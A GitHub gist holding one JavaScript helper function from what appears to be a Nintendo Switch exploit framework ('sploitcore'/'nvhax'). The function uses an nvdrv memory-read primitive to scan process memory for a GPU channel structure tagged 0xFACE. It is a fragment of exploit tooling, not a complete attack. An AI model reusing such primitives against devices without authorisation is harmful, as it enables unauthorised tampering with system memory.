Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
sploitcore.prototype.nvhax_find_channel = function(hw_num) {
var mem_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40000);
var page_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40100);
var test_addr = [0, 0];
var ch_base_addr = [0, 0];
// Look for user channel
while (test_addr[1] < 0x80)
{
var result = this.nvhax_svc(0x06, [mem_info_addr, page_info_addr, test_addr], [], false);
var mem_base_addr = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x00));
var mem_size = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x08));
var mem_type_attr = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x10));
var mem_perm_ipc = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x18));
var mem_dev_pad = this.read_nvdrv_mem(utils.add2(mem_info_addr, 0x20));
var mem_type = mem_type_attr[0];
var mem_attr = mem_type_attr[1];
var mem_perm = mem_perm_ipc[0];
var mem_ipc = mem_perm_ipc[1];
var mem_dev = mem_dev_pad[0];
var mem_pad = mem_dev_pad[1];
if (((mem_attr & 0x04) == 0x04)
&& (mem_size[0] <= 0x10000))
{
var ch_sig = this.read_nvdrv_mem(utils.add2(mem_base_addr, 0x10));
var ch_num = this.read_nvdrv_mem(utils.add2(mem_base_addr, 0xE8));
if (ch_sig[0] == 0xFACE)
{
utils.log('Found channel 0x' + ch_num[0].toString(16) + ': ' + utils.paddr(mem_base_addr));
if (ch_num[0] == hw_num)
{
ch_base_addr = mem_base_addr;
break;
}
}
}
var next_addr_lo = (((test_addr[0] + mem_size[0]) & 0xFFFFFFFF) >>> 0);
var next_addr_hi = (((test_addr[1] + mem_size[1]) & 0x000000FF) >>> 0);
if ((test_addr[0] + mem_size[0]) > 0xFFFFFFFF)
next_addr_hi++;
test_addr[0] = next_addr_lo;
test_addr[1] = next_addr_hi;
}
return ch_base_addr;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.